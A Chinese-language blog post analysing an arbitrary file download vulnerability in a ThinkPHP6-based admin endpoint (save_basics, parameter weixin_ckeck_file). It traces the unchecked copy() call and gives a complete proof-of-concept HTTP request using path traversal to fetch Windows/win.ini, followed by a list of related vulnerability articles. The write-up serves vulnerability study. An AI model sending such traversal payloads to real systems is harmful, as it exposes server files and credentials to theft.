任意文件下载漏洞分析

最新推荐文章于 2026-04-06 09:32:52 发布
原创 最新推荐文章于 2026-04-06 09:32:52 发布 · 1.4k 阅读 · 18 ·
本内容遵循CC 4.0 BY-SA版权协议
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
标签
#任意文件下载

一、漏洞简介
​app/adminapi/controller/v1/setting/SystemConfig.php​路由中存在任意文件下载漏洞

二、影响版本
<= v5.4.0

三、环境搭建
配置phpstudy,将网站的运行目录,设置在public​目录下 在这里插入图片描述
设置伪静态 在这里插入图片描述
四、漏洞原理分析
该系统采用前后端分离技术,基于ThinkPHP6+elementUI+Uni-app框架开发

首先我们查看路由,看到这是一个后台的任意文件下载,并且/adminapi/setting/config/save_basics​路径会进去到 v1.setting.SystemConfig/save_basics​ 这个路径下 在这里插入图片描述
受影响的代码在app/adminapi/controllerv1.setting.SystemConfig/save_basics.php​文件的save_basics​中

这里从请求中获取 POST 参数,然后遍历 POST 数据的每个键值对,k​表示字段名,k​ 表示字段名,k表示字段名,v​ 表示字段值。在这里插入图片描述
接着是一系列的判断,判断post​参数是否存在这些,然后在weixin_ckeck_file​post参数中,存在copy​函数,可以将文件进行复制的一个操作
在这里插入图片描述
接着跟踪代码,发现public_path​就是在public​目录,这里存在copy​文件到public​目录下的一个操作 在这里插入图片描述
分析$to = public_path() . array_reverse(explode(‘/’, $post[‘weixin_ckeck_file’]))[0];​这个代码,就是将字符串按 /​ 分割成一个数组,然后提取最后一个部分(就是文件名),然后拼接到public​目录下

进行动调一下,看看是否和我们之前描述的一样。 在这里插入图片描述
可以看到,结果就是我们所描述的那种。并且由于是thinkphp的框架,所以运行的目录也是在public​目录下面。因此可以直接去访问那个文件,便可以进行下载文件。

五、漏洞复现
POST /adminapi/setting/config/save_basics HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Authori-zation:
Cookie: cb_lang=zh-cn;
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Priority: u=0, i
Content-Type: application/json;charset=utf-8
Content-Length: 72

{
“weixin_ckeck_file”: “…/…/…/…/…/…/…/…/Windows/win.ini”
}
在这里插入图片描述
然后访问直接win.ini便可以下载win.ini文件 在这里插入图片描述
六、总结
这是一个由于copy​函数没有严格控制路径问题,导致存在一个任意文件下载的操作。

Java代码审计——JEESNS漏洞&悟空CRM漏洞&访问控制
m0_61506558的博客
12-25 1690
可以看到它把关键字alert前面加上了_,导致js代码无法执行,我们在idea里面找路由。这里突破口是用prompt(/xss/)进行过滤。修改 POST请求内容,Content-Type更改为json格式,send一下。找对应,触发过滤器的代码,filter找到了class文件。(一)JEESNS漏洞&黑名单。翻了半天没找到,然后再找。(二)悟空CRM&组件安全。
金某OA协同办公管理系统存在任意文件下载漏洞分析 CNVD-2021-43036
afei001
10-19 677
金和OA是由北京金某网络股份有限公司开发的一款办公自动化软件。旨在提高企业的工作效率和管理水平。它提供了一系列功能模块,涵盖了办公流程的各个方面,包括文档管理、协同办公、人力资源管理、客户关系管理、财务管理等。 金和C6协同管理平台存在任意文件下载漏洞,攻击者可利用该漏洞获取敏感信息。
记一次任意文件下载漏洞思路(jeesite框架)
Websec
09-10 1万+
1、测试某个系统的文件下载的接口,看到下载接口的参数为url,参数值是文件的绝对路径,实测发现存在任意文件下载漏洞。 post包如下: GET /xxxx/oaNotify/downLoadFile?fileUrl=xxxxxx.pdf HTTP/1.1 Host:xxxx.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0 Accept: text/html.
AppScan检查到的一些中高危漏洞解决方案
zhaofuqiangmycomm的博客
06-07 3095
解决办法:在shiro的配置文件中 引入 解决办法:在shiro的配置文件中 引入 2.1再加全局拦截器: 再看所有请求头中已有Secure 和HttpOnly属性2.2.servlet3及以上 在web.xml中引入 http-only 和secure的属性 解决办法:mvc全局拦截器处理非法字符 解决办.......................................
深入剖析JeeSite框架中的任意文件下载漏洞实战
最新发布
weixin_42531886的博客
04-06 281
本文深入分析JeeSite框架中的任意文件下载漏洞,详细介绍了漏洞的发现过程、利用技巧及防御方案。通过实战案例展示了如何通过漏洞获取敏感配置文件、数据库凭证等关键信息,并提供了临时修复措施和长期解决方案,帮助开发者提升系统安全性。
JeeSite3.0框架Shiro序列化漏洞修复解决方法
weixin_43865714的博客
02-16 2459
Jeesite3.0框架项目Apache Shiro 反序列化漏洞修复
关于JeeSite框架Shiro序列化漏洞修复解决方法
ying_521125的博客
11-21 4115
关于JeeSite框架Shiro序列化漏洞修复解决方法 一、升级shiro的版本 将这里改为百度上所说的那个有漏洞的版本以上的随便版本:1.2.4以上版本 这里刚开始以为修改版本就可以解决这个漏洞,然而并没有。所以产生了第二步。 二、配置动态密匙 1、找到项目shiro配置文件 2、按照源码的方式新写一个秘钥生成器 (1) 到项目种shiro目录下面新建一个类(如下图) (2) 详细代码 public class GenerateCipherKey { /** * 随机生成密匙
从代码审计的角度分析 Ruoyi v4.7.6 的任意文件下载漏洞
新青年1号
05-26 4754
从代码审计的角度看 Ruoyi v4.7.6 任意文件下载漏洞
任意文件下载漏洞利用分析和防御方法
白帽黑客鹏哥的博客
12-20 3588
任意文件下载漏洞是指攻击者可以通过特制的URL请求,绕过服务器的安全检查,下载服务器上任意文件。这通常是由于服务器端对用户请求的文件路径没有进行足够的过滤或验证,导致攻击者可以通过构造特殊的URL请求来访问服务器上任意文件。为了修复任意文件下载漏洞,服务器端需要对用户请求的文件路径进行严格的过滤和验证,防止攻击者通过构造特殊的URL请求来访问服务器上任意文件。一旦发现任意文件下载漏洞,就可以利用它来下载服务器上的任意文件。例如,可以通过以下步骤利用任意文件下载漏洞下载服务器上的。
Wordpress Ajax Load More plugins CVE-2022-2943授权任意文件下载漏洞分析
afei001
03-28 591
CVE-2022-2943授权任意文件下载漏洞分析
万户OA downloadhttp任意文件下载漏洞分析与自动化验证脚本 CNVD-2016-06898
afei001
01-03 2196
万户OA downloadhttp任意文件下载漏洞分析与自动化验证脚本 CNVD-2016-06898
接口验证和限制响应次数
weixin_45943355的博客
03-08 1120
需求分析 最近很闲,就写个功能型小程序,用uniapp写的,没有使用云数据库,就自己买了个腾讯的云服务器,很便宜,在买个域名,十多天完成备案,把这些都准备好就可以开始写了,首先就想到了2个功能,短视频解析和运动步数修改,这些代码都是网上参考原理写出来的。因为我懒得弄那些加密什么的,本以为就自己用,没想到居然还有人使用xss注入攻击我网站,真的无语。后台使用的是jeesite社区版的,功能很强大,那些sql注入都被拦截下来了,我看了也就没理会,以为他会放弃的,可没想到攻击者一个接着一个来,都不消停了,看.
web安全(5)-- 越权操作
热门推荐
TaneRoom的博客
11-18 2万+
越权漏洞是比较常见的漏洞类型,越权漏洞可以理解为,一个正常的用户A通常只能够对自己的一些信息进行增删改查,但是由于程序员的一时疏忽未对信息进行增删改查的时候没有进行一个判断,判断所需要操作的信息是否属于对应的用户,可以导致用户A可以操作其他人的信息。​
解决jeesite ckfinder上传中文文件无法查看的问题
weixin_43865714的博客
02-16 511
解决jeesite ckfinder上传中文文件无法查看的问题
4.1.4 测试 Web 应用程序漏洞
qq_44232452的博客
08-23 381
总结测试 Web 应用程序漏洞的一个重要步骤是找出 Web 服务器上托管了哪些特定应用程序。许多应用程序具有已知的漏洞和已知的攻击策略,可以利用这些漏洞和攻击策略来获得远程控制或利用数据。此外,许多应用程序经常配置错误或未更新,因为人们认为它们仅在“内部”使用,因此不存在威胁。随着虚拟 Web 服务器的激增,IP 地址和 Web 服务器之间的传统 1:1 类型关系正在失去其原有的大部分意义。具有多个站点或应用程序的符号名称解析为同一 IP 地址的情况并不少见。
dzzoffice 任意文件下载漏洞分析
aihuochou9723的博客
07-31 1089
dzzoffice 任意文件下载\updload\dzz\system\save.php第72行开始: elseif($_GET['do']=='move'){ $obz=trim($_GET['obz']); $tbz=trim($_GET['tbz']); $sourcetype=trim($_GET['sourcetype']); $icoids=ex...
phpcms down.php 漏洞,phpcms v9.6.1任意文件下载漏洞分析及EXP
weixin_32161697的博客
03-18 750
阅读:7,963之前PHPCMS V9.6.0被爆出来一波SQL注入个getshell的漏洞,官方修复了(典型的指哪修哪)并且发布了V9.6.1。但是并没有修复完全,又被搞出来一个任意文件下载漏洞,此漏洞Payload同样可以绕过WAF检测。漏洞分析这个漏洞的套路跟之前的那个SQL注入漏洞一样。这次我们顺着来看这个漏洞产生的过程。漏洞触发点在文件/phpcms/modules/content/d...
【代码审计】ThinkSNS_V4 任意文件下载漏洞分析
12-03 971
  0x00 环境准备 ThinkSNS官网:http://www.thinksns.com 网站源码版本:ThinkSNS V4  更新时间:2017-09-13 程序源码下载:http://www.thinksns.com/experience.html(填写信息后,提交并下载代码) 默认后台:http://127.0.0.1/index.php?app=admin&amp...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值